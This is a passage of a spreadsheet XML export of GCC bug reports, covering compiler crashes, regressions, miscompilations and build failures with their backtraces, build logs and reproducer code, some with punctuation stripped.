        (EXTRA_BUILD_FLAGS): Correct typo.  Pass CPPFLAGS.
        (HOST_EXPORTS): Pass CPPFLAGS.
        (CPPFLAGS_FOR_BUILD CPPFLAGS CPPFLAGS_FOR_TARGET): Define.
        (LDFLAGS_FOR_TARGET): Initialize from configure script.
        (EXTRA_TARGET_FLAGS): Set CPPFLAGS.
        * Makefile.in configure: Regenerated.
        * configure.ac: Set CPPFLAGS_FOR_TARGET LDFLAGS_FOR_TARGET
        and CPPFLAGS_FOR_BUILD.
        libiberty/
        * Makefile.in (CPPFLAGS): Define.
        (FLAGS_TO_PASS COMPILE.c): Add CPPFLAGS.
Currently I have to explicitly set CPPFLAGS to build gcc trunk which results in many duplicate instances of -I/sw/include throughout the build.</t>
  </si>
  <si>
    <t>GCC-34699</t>
  </si>
  <si>
    <t>FAIL: gfortran.fortran-torture/execute/intrinsic_set_exponent.f90 execution</t>
  </si>
  <si>
    <t>Executing on host: /xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/
xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ /xxx/gnu/gcc/gcc/gcc/testsuite/
gfortran.fortran-torture/execute/intrinsic_set_exponent.f90  -w  -O0   -L/xxx/gn
u/gcc/objdir/hppa1.1-hp-hpux10.20/./libgfortran/.libs -L/xxx/gnu/gcc/objdir/hppa
1.1-hp-hpux10.20/./libgfortran/.libs -L/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/
./libiberty  -lm   -o /xxx/gnu/gcc/objdir/gcc/testsuite/gfortran/intrinsic_set_e
xponent.x    (timeout = 600)
PASS: gfortran.fortran-torture/execute/intrinsic_set_exponent.f90 compilation
-O0
Setting LD_LIBRARY_PATH to .:/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./libgfort
ran/.libs:/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./libgfortran/.libs:/xxx/gnu/
gcc/objdir/gcc:.:/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./libgfortran/.libs:/x
xx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/./libgfortran/.libs:/xxx/gnu/gcc/objdir/g
cc
FAIL: gfortran.fortran-torture/execute/intrinsic_set_exponent.f90 execution  -O
0
This appears to a problem arising from the incorrect linking of
libgfortran.sl.2.0.  The first clue was the test passed if the program was
linked with -static.  Then I realized that there isn't a shared version
of libm only an archive version /lib/pa1.1/libm.a.  Removing -lm -lc
for the link command for libgfortran.sl.2.0 results in the test passing.</t>
  </si>
  <si>
    <t>GCC-69058</t>
  </si>
  <si>
    <t>segfault with ftree-parallelize-loops=2 in libgo/go/strconv/decimal.go</t>
  </si>
  <si>
    <t>$ gccgo src/libgo/go/strconv/decimal.go -O2 -ftree-parallelize-loops=2 -S
src/libgo/go/strconv/decimal.go: In function strconv.RoundedInteger.pN18_go.strconv.decimalï¿½:
src/libgo/go/strconv/decimal.go:397:1: internal compiler error: Segmentation fault
 func (a *decimal) RoundedInteger() uint64 {
 ^
0xb6ab1f crash_signal
        src/gcc/toplev.c:334
0xdfa128 contains_struct_check(tree_node* tree_node_structure_enum char const* int char const*)
        src/gcc/tree.h:3110
0xdfa128 build_call_expr_loc_array(unsigned int tree_node* int tree_node**)
        src/gcc/tree.c:11014
0xdfa36d build_call_expr(tree_node* int ...)
        src/gcc/tree.c:11064
0xa220c3 expand_omp_atomic_mutex
        src/gcc/omp-low.c:12257
0xa220c3 expand_omp_atomic
        src/gcc/omp-low.c:12344
0xa220c3 expand_omp
        src/gcc/omp-low.c:13195
0xa213e0 expand_omp
        src/gcc/omp-low.c:13141
0xa23c2d execute_expand_omp
        src/gcc/omp-low.c:13380
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78058</t>
  </si>
  <si>
    <t>Complex initialization of nested std::optional does not work</t>
  </si>
  <si>
    <t>The following program fails to compile:
```
#include 
#include 
using std::optional
using std::nullopt
using std::in_place
int main()
{
   optional&gt;&gt; o (in_place in_place nullopt)
   assert (o)
   assert (*o)
   assert (!**o)
}
```
Overload resolution cannot find the right constructor. I expect this to compile the meaning is described with the assertions.
The middle optional is initialized with two arguments {in_place nullopt} which means that the innermost optional is initialized with nullptr.
The same program compiles with the reference implementation: https://github.com/akrzemi1/Optional</t>
  </si>
  <si>
    <t>GCC-50164</t>
  </si>
  <si>
    <t>[IRA 4.7 Regression] Performance degradation due to increased memory instructions count</t>
  </si>
  <si>
    <t>Created attachment 25083
Reproducer
Problem occurs with -march=atom option used on the following part of test case:
  xc = (e_u8) (xc - xk)
  xm = (e_u8) (xm - xk)
  xy = (e_u8) (xy - xk)
  *EritePtr++ = xc
  *EritePtr++ = xm
  *EritePtr++ = xy
  *EritePtr++ = xk
xk has the most usages here and GCC 4.6 keeps it on register but GCC 4.7 keeps it on stack which leads to increased number of memory instructions for that code. On Core i7 GCC 4.7 generates code x1.5 slower than GCC 4.6. On Atom it is ~10% slower.
GCC 4.6 info:
Configured with: /export/users/mstester/stability/svn/gcc-4_6-branch/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --prefix=/export/users/mstester/stability/work/gcc-4_6-branch/64/install --enable-languages=cc++fortran
Thread model: posix
gcc version 4.6.2 20110822 (prerelease) (GCC)
COLLECT_GCC_OPTIONS='-O2' '-march=atom' '-m32' '-o' 'test.4.6' '-v'
 /nfs/ims/proj/icl/gcc/gnu/compilers/gcc/gcc-4_6-branch/64/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.6.2/cc1 -quiet -v -imultilib 32 -iprefix /nfs/ims/proj/icl/gcc/gnu/compilers/gcc/gcc-4_6-branch/64/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.6.2/ test.c -quiet -dumpbase test.c -march=atom -m32 -auxbase test -O2 -version -o /tmp/ccM2NIHU.s
GNU C (GCC) version 4.6.2 20110822 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.2 20110822 (prerelease) GMP version 4.3.1 MPFR version 2.4.2 MPC version 0.8.1
GCC 4.7 info:
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-master/configure --prefix=/export/gcc-master-build
Thread model: posix
gcc version 4.7.0 20110822 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-O2' '-march=atom' '-m32' '-o' 'test.4.7' '-v'
 /export/gcc-master-build/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1 -quiet -v -imultilib 32 test.c -quiet -dumpbase test.c -march=atom -m32 -auxbase test -O2 -version -o /tmp/cc5DRHOU.s
GNU C (GCC) version 4.7.0 20110822 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.0 20110822 (experimental) GMP version 4.3.2 MPFR version 3.0.0 MPC version 0.8.3-dev</t>
  </si>
  <si>
    <t>GCC-52887</t>
  </si>
  <si>
    <t>Bootstrap on AIX failure: Undefined symbol: .std::function::function(std::function const&amp;)</t>
  </si>
  <si>
    <t>Bootstrapping GCC 4.7.0 on an AIX 5.3 system fails with
/tmp/gcc-4.7.0-build/./prev-gcc/g++ -B/tmp/gcc-4.7.0-build/./prev-gcc/ -B/opt/tg/powerpc-ibm-aix5.3.0.0/bin/ -nostdinc++ -B/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/src/.libs -B/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/libsupc++/.libs -I/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/include/powerpc-ibm-aix5.3.0.0 -I/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/include -I/home/src/gcc-4.7.0/libstdc++-v3/libsupc++ -L/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/src/.libs -L/tmp/gcc-4.7.0-build/prev-powerpc-ibm-aix5.3.0.0/libstdc++-v3/libsupc++/.libs   -g -O2 -DIN_GCC   -fno-exceptions -fno-rtti -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -static-libstdc++ -static-libgcc -Wl-bbigtoc -Wl-bmaxdata:0x40000000 -o cc1 c-lang.o c-family/stub-objc.o attribs.o c-errors.o c-decl.o c-typeck.o c-convert.o c-aux-info.o c-objc-common.o c-parser.o tree-mudflap.o c-family/c-common.o c-family/c-cppbuiltin.o c-family/c-dump.o c-family/c-format.o c-family/c-gimplify.o c-family/c-lex.o c-family/c-omp.o c-family/c-opts.o c-family/c-pch.o c-family/c-ppoutput.o c-family/c-pragma.o c-family/c-pretty-print.o c-family/c-semantics.o c-family/c-ada-spec.o default-c.o rs6000-c.o \
          cc1-checksum.o main.o  libbackend.a libcommon-target.a libcommon.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a libcommon.a ../libcpp/libcpp.a   ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a    -L/usr/local/lib -L/usr/local/lib -L/usr/local/lib -lmpc -lmpfr -lgmp   -L../zlib -lz
ld: 0711-317 ERROR: Undefined symbol: .std::function::function(std::function const&amp;)
ld: 0711-317 ERROR: Undefined symbol: .std::function::function(std::function const&amp;)
ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more information.
collect2: error: ld returned 8 exit status
gmake[3]: *** [cc1] Error 1
gmake[3]: Leaving directory `/tmp/gcc-4.7.0-build/gcc'
gmake[2]: *** [all-stage2-gcc] Error 2
gmake[2]: Leaving directory `/tmp/gcc-4.7.0-build'
gmake[1]: *** [stage2-bubble] Error 2
gmake[1]: Leaving directory `/tmp/gcc-4.7.0-build'
gmake: *** [bootstrap-lean] Error 2
The build tree was configured with
'--prefix=/opt/tg' '--disable-dependency-tracking' '--disable-maintainer-mode' '--program-prefix=tg-' '--disable-shared' '--disable-nls' '--enable-version-specific-runtime-libs' '--with-pic' '--with-mpc=/usr/local' '--with-mpfr=/usr/local' '--with-gmp=/usr/local' 'CC=tg-gcc -mminimal-toc' 'CXX=false' '--enable-languages=cc++'</t>
  </si>
  <si>
    <t>GCC-1048</t>
  </si>
  <si>
    <t>Seems to mis-compile for loop init expression</t>
  </si>
  <si>
    <t>For this fragment of current perl5.7.* sources:
    char *s *t
    bool hibit
    if (!sv || !SvPOK(sv) || SvUTF8(sv))
	return
    /* This function could be much more efficient if we had a FLAG in SVs
     * to signal if there are any hibit chars in the PV.
     */
    for (s = t = SvPVX(sv) hibit = FALSE t &lt; SvEND(sv)  t++) {
	if (*t &amp; 0x80)
	    hibit = TRUE
    }
    if (hibit) {
hibit seems to be in %o2 - but the 
  hibit = FALSE 
assignment does not happen.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.5.1
How-To-Repeat:
gcc -S -fno-strict-aliasing -O2 -mv8 bug.i</t>
  </si>
  <si>
    <t>nik</t>
  </si>
  <si>
    <t>GCC-71253</t>
  </si>
  <si>
    <t>[7 Regression] ICE during loop distribution w/ -O2 -ftree-loop-distribution</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160522 segfaults when compiling the following reduces snippet w/ -O2 -ftree-loop-distribution:
int jo af yb
long int wt
void
nr (void)
{
  int *bf = 
  for ()
    {
      while (jo != 0)
        {
          long int *ad = (long int *) 
          for ()
            {
              int fv
              for (*ad = 1 *ad &lt; 3 ++(*ad))
                {
                  af = *bf
                  fv = wt
                }
              bf = (int *) 
              ad = 
              do
                {
                  jo = wt = ((wt != 0) ? 1 : fv)
                }
              while (jo != 0)
            }
        }
      bf = 
    }
}
% x86_64-pc-linux-gnu-gcc-7.0.0-alpha20160522 -c -O2 -ftree-loop-distribution gdgqziql.c 
gdgqziql.c: In function 'nr':
gdgqziql.c:5:1: internal compiler error: Segmentation fault
 nr (void)
 ^~
#0  0x0000000000bc7170 in last_stmt(basic_block_def*) ()
#1  0x0000000000c2008b in create_edge_for_control_dependence(graph* basic_block_def* int control_dependences*) [clone .isra.31] ()
#2  0x0000000000c2141c in build_rdg(vec control_dependences*) ()
#3  0x0000000000c21740 in distribute_loop(loop* vec control_dependences* int* bool*) ()
#4  0x0000000000c246ff in (anonymous namespace)::pass_loop_distribution::execute(function*) ()
#5  0x0000000000ac4f5c in execute_one_pass(opt_pass*) ()
#6  0x0000000000ac5518 in execute_pass_list_1(opt_pass*) ()
#7  0x0000000000ac552a in execute_pass_list_1(opt_pass*) ()
#8  0x0000000000ac552a in execute_pass_list_1(opt_pass*) ()
#9  0x0000000000ac5575 in execute_pass_list(function* opt_pass*) ()
#10 0x00000000007b1614 in cgraph_node::expand() ()
#11 0x00000000007b2ec0 in symbol_table::compile() [clone .part.49] ()
#12 0x00000000007b5273 in symbol_table::finalize_compilation_unit() ()
#13 0x0000000000b8ebba in compile_file() ()
#14 0x000000000061a6df in toplev::main(int char**) ()
#15 0x000000000061c8f7 in main ()</t>
  </si>
  <si>
    <t>GCC-37794</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] Fortran module overloading regression</t>
  </si>
  <si>
    <t>If we overload symbols from modules with specific names I can cause an ICE. Works fine with earlier versions of gfortran and an old build of gcc-4.4.0.
This error occurs with a build of svn version  number 141030
gfortran-4.4  -c -o hsl_of01d.o hsl_of01d.f90
gfortran-4.4  -c -o hsl_of01i.o hsl_of01i.f90
gfortran-4.4  -c -o test.o test.f90
f951: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [test.o] Error 1
Files:
! hsl_of01d.f90
module hsl_of01_double
  implicit none
  type of01_data_private
    real :: foo
  end type of01_data_private
  type of01_data
    type (of01_data_private) :: private
  end type of01_data
end module hsl_of01_double
! hsl_of01i.f90
module hsl_of01_integer
  implicit none
  type of01_data_private
    integer :: youngest
  end type of01_data_private
end module hsl_of01_integer
! test.f90
module test_mod
  use hsl_of01_double of01_rdata =&gt; of01_data
  use hsl_of01_integer of01_idata =&gt; of01_data
  implicit none
end module test_mod</t>
  </si>
  <si>
    <t>J.Hogg</t>
  </si>
  <si>
    <t>GCC-58671</t>
  </si>
  <si>
    <t>[c++11] ICE with thread_local and self-referential variable initialization</t>
  </si>
  <si>
    <t>The following valid code line(compiled with -std=c++11) triggers an ICE since GCC 4.8.0 (when thread_local was introduced):
==============================
thread_local int i = i
==============================
bug.cc:1:22: internal compiler error: in var_defined_without_dynamic_init at cp/decl2.c:2836
 thread_local int i = i
                      ^
0x60966a var_defined_without_dynamic_init
        ../../gcc/gcc/cp/decl2.c:2836
0x60966a var_needs_tls_wrapper
        ../../gcc/gcc/cp/decl2.c:2852
0x6164db get_tls_wrapper_fn(tree_node*)
        ../../gcc/gcc/cp/decl2.c:2950
0x6b612f finish_id_expression(tree_node* tree_node* tree_node* cp_id_kind* bool bool bool* bool bool bool bool char const** unsigned int)
        ../../gcc/gcc/cp/semantics.c:3387
0x63fc90 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4539
0x641890 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5814
0x64405d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7009
0x644c2f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
0x6450ef cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7937
0x645546 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7987
0x645546 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8197
0x6512ae cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16530
0x65187f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:10995
0x653700 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10876
0x65c73e cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10773
0x65b4aa cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10659
0x65cd76 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x65cd76 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28911
0x770903 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-57286</t>
  </si>
  <si>
    <t>[4.9 regression] infinite recursion in fold-const.c:10037</t>
  </si>
  <si>
    <t>Created attachment 30121
preprocessed source
(gdb) r
Starting program: /usr/libexec/gcc/i686-pc-cygwin/4.9.0/cc1.exe -quiet -v -I . -I .. -I ../include -MD .libs/libfaac_la-aacquant.d -MF .deps/libfaac_la-aacquant.Tpo -MP -MT libfaac_la-aacquant.lo -Dunix -idirafter /usr/lib/gcc/i686-pc-cygwin/4.9.0/../../../../include/w32api -idirafter /usr/lib/gcc/i686-pc-cygwin/4.9.0/../../../../i686-pc-cygwin/lib/../../include/w32api -D HAVE_CONFIG_H -D DRM -D DLL_EXPORT -D PIC aacquant.c -march=core2 -mcx16 -msahf -mno-movbe -mno-aes -mno-pclmul -mno-popcnt -mno-abm -mno-lwp -mno-fma -mno-fma4 -mno-xop -mno-bmi -mno-bmi2 -mno-tbm -mno-avx -mno-avx2 -mno-sse4.2 -msse4.1 -mno-lzcnt -mno-rtm -mno-hle -mno-rdrnd -mno-f16c -mno-fsgsbase -mno-rdseed -mno-prfchw -mno-adx -mfxsr -mno-xsave -mno-xsaveopt --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=core2 -quiet -dumpbase aacquant.c -auxbase-strip .libs/libfaac_la-aacquant.o -g -O4 -std=gnu11 -version -frename-registers -fno-strict-overflow -o /tmp/ccEheGnn.s
[New Thread 16040.0x374c]
[New Thread 16040.0x1e20]
GNU C (GCC) version 4.9.0 20130515 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.9.0 20130515 (experimental) GMP version 5.0.2 MPFR version 3.2.0-dev MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/lib/gcc/i686-pc-cygwin/4.9.0/../../../../i686-pc-cygwin/include
ignoring duplicate directory /usr/lib/gcc/i686-pc-cygwin/4.9.0/../../../../i686-pc-cygwin/lib/../../include/w32api
#include ... search starts here:
#include  search starts here:
 .
 ..
 ../include
 /usr/lib/gcc/i686-pc-cygwin/4.9.0/include
 /usr/local/include
 /usr/lib/gcc/i686-pc-cygwin/4.9.0/include-fixed
 /usr/include
 /usr/lib/gcc/i686-pc-cygwin/4.9.0/../../../../include/w32api
End of search list.
GNU C (GCC) version 4.9.0 20130515 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 4.9.0 20130515 (experimental) GMP version 5.0.2 MPFR version 3.2.0-dev MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: ebeca84797ce5db4d10946c78482951c
Program received signal SIGSEGV Segmentation fault.
int_const_binop_1 (code=BIT_IOR_EXPR arg1=0x7fbdfb40 arg2=0x7fbdfb20
    overflowable=0x1) at ../.././gcc/fold-const.c:934
934       tree type = TREE_TYPE (arg1)
(gdb) bt -50
....
#25936 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9e28
    cond=0x7fa71350 arg=0x7fac9e28 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
#25937 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9e28)
---Type  to continue or q  to quit---
    at ../.././gcc/fold-const.c:10037
#25938 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9e28)
    at ../.././gcc/fold-const.c:14944
#25939 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9e10 op2=0x7fac9e28)
    at ../.././gcc/fold-const.c:14261
#25940 0x007e6224 in fold_build3_stat_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9e10 op2=0x7fac9e28)
    at ../.././gcc/fold-const.c:15006
#25941 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9dc8
    cond=0x7fa71350 arg=0x7fac9dc8 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
#25942 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9dc8)
    at ../.././gcc/fold-const.c:10037
#25943 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9dc8)
    at ../.././gcc/fold-const.c:14944
#25944 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9db0 op2=0x7fac9dc8)
    at ../.././gcc/fold-const.c:14261
---Type  to continue or q  to quit---
#25945 0x007e6224 in fold_build3_stat_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9db0 op2=0x7fac9dc8)
    at ../.././gcc/fold-const.c:15006
#25946 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d68
    cond=0x7fa71350 arg=0x7fac9d68 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
#25947 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d68)
    at ../.././gcc/fold-const.c:10037
#25948 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d68)
    at ../.././gcc/fold-const.c:14944
#25949 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d50 op2=0x7fac9d68)
    at ../.././gcc/fold-const.c:14261
#25950 0x007e6224 in fold_build3_stat_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d50 op2=0x7fac9d68)
    at ../.././gcc/fold-const.c:15006
#25951 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d08
    cond=0x7fa71350 arg=0x7fac9d08 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
---Type  to continue or q  to quit---
#25952 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d08)
    at ../.././gcc/fold-const.c:10037
#25953 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9d08)
    at ../.././gcc/fold-const.c:14944
#25954 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9cf0 op2=0x7fac9d08)
    at ../.././gcc/fold-const.c:14261
#25955 0x007e6224 in fold_build3_stat_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9cf0 op2=0x7fac9d08)
    at ../.././gcc/fold-const.c:15006
#25956 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9ca8
    cond=0x7fa71350 arg=0x7fac9ca8 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
#25957 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9ca8)
    at ../.././gcc/fold-const.c:10037
#25958 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9ca8)
    at ../.././gcc/fold-const.c:14944
#25959 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
---Type  to continue or q  to quit---
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9c90 op2=0x7fac9ca8)
    at ../.././gcc/fold-const.c:14261
#25960 0x007e6224 in fold_build3_stat_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fac9c90 op2=0x7fac9ca8)
    at ../.././gcc/fold-const.c:15006
#25961 0x00799b42 in fold_binary_op_with_conditional_arg (loc=0x0
    code=BIT_IOR_EXPR type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fa71338
    cond=0x7fa71350 arg=0x7fa71338 cond_first_p=0x1)
    at ../.././gcc/fold-const.c:6129
#25962 0x007b1963 in fold_binary_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fa71338)
    at ../.././gcc/fold-const.c:10037
#25963 0x007e618d in fold_build2_stat_loc (loc=0x0 code=BIT_IOR_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fa71338)
    at ../.././gcc/fold-const.c:14944
#25964 0x007e3f28 in fold_ternary_loc (loc=0x0 code=VEC_COND_EXPR
    type=0x7fd5ff60 op0=0x7fa71350 op1=0x7fa71320 op2=0x7fa71338)
    at ../.././gcc/fold-const.c:14261
#25965 0x00b7b85a in fold_gimple_assign (si=0x5eea414)
    at ../.././gcc/gimple-fold.c:524
#25966 0x00b7d734 in fold_stmt_1 (gsi=0x5eea414 inplace=0x0)
    at ../.././gcc/gimple-fold.c:1184
#25967 0x00b7de12 in fold_stmt (gsi=0x5eea414)
---Type  to continue or q  to quit---
    at ../.././gcc/gimple-fold.c:1312
#25968 0x00b96c72 in optimize_stmt (bb=0x7febc800 si=...)
    at ../.././gcc/tree-ssa-dom.c:2301
#25969 0x00b95c8f in dom_opt_enter_block (walk_data=0x5eea4d8 bb=0x7febc800)
    at ../.././gcc/tree-ssa-dom.c:1853
#25970 0x00e2fc6f in walk_dominator_tree (walk_data=0x5eea4d8 bb=0x7febc800)
    at ../.././gcc/domwalk.c:210
#25971 0x00b90adc in tree_ssa_dominator_optimize ()
    at ../.././gcc/tree-ssa-dom.c:827
#25972 0x006e5752 in execute_one_pass (pass=0x20041b58)
    at ../.././gcc/passes.c:2337
#25973 0x006e594d in execute_pass_list (pass=0x20041b58)
    at ../.././gcc/passes.c:2389
#25974 0x006e5979 in execute_pass_list (
    pass=0x1056500 ) at ../.././gcc/passes.c:2390
#25975 0x006ebb3f in expand_function (node=0x7fd244c0)
    at ../.././gcc/cgraphunit.c:1640
#25976 0x006ec080 in expand_all_functions () at ../.././gcc/cgraphunit.c:1744
#25977 0x006ecaeb in compile () at ../.././gcc/cgraphunit.c:2042
#25978 0x006ecc62 in finalize_compilation_unit ()
    at ../.././gcc/cgraphunit.c:2119
#25979 0x00423e4e in c_write_global_declarations ()
    at ../.././gcc/c/c-decl.c:10118
---Type  to continue or q  to quit---
#25980 0x0077310b in compile_file () at ../.././gcc/toplev.c:558
#25981 0x00774f39 in do_compile () at ../.././gcc/toplev.c:1872
#25982 0x007750c0 in toplev_main (argc=0x51 argv=0x5eea790)
    at ../.././gcc/toplev.c:1948
#25983 0x00f2552c in main (argc=0x51 argv=0x5eea790) at ../.././gcc/main.c:36
#25984 0x610078d1 in _cygwin_exit_return ()
    at /netrel/src/cygwin-snapshot-20130409-1/winsup/cygwin/dcrt0.cc:1018
#25985 0x610053ed in _cygtls::call2 (this=
    func=0x61006dc0  arg=0x0
    buf=0x6100558b )
    at /netrel/src/cygwin-snapshot-20130409-1/winsup/cygwin/cygtls.cc:99
#25986 0x05eeff78 in ?? ()
#25987 0x00faa422 in cygwin_crt0 (f=0xf2550c )
    at /usr/src/debug/cygwin-1.7.17-1/winsup/cygwin/lib/cygwin_crt0.c:22
#25988 0x00401015 in mainCRTStartup ()
    at /usr/src/debug/cygwin-1.7.17-1/winsup/cygwin/crt0.c:29
(gdb)</t>
  </si>
  <si>
    <t>GCC-19283</t>
  </si>
  <si>
    <t>[4.0 Regression] Bad code generated in final_cleanup</t>
  </si>
  <si>
    <t xml:space="preserve">
g++ generates bad code for the program below if -O3 is used.
If optimization is off it works correctly.
$ g++ -o x x.cc
$ ./x
$ g++ -o x x.cc -O3
$ ./x
fail
$
Here is the generated code for main() (with exception-handling labels elided):
main:
	pushl	%ebp
	movl	%esp %ebp
	subl	$8 %esp
	andl	$-16 %esp
	subl	$16 %esp
	movl	$.LC0 (%esp)
	call	puts
	xorl	%eax %eax
	leave
	ret
The test has been erroneously optimized out.
Here's main() from x.cc.t66.blocks:
int main() ()
{
:
  if ((short int) (short unsigned int) (int) (short unsigned int) rawdata  else goto 
:
  printf (
:
  return 0
}
This looks ok.
And here it is from x.cc.t67.final_cleanup:
 Function int main() (main)
Merging blocks 0 and 1
Merging blocks 0 and 2
int main() ()
{
:
  printf (
  return 0
}
Where the test is gone.
So the problem is in this step.
This looks like it may be related to the previous bug
tree-optimization/18576.  However that one is classified
as missed-optimization while this is wrong code.
Environment:
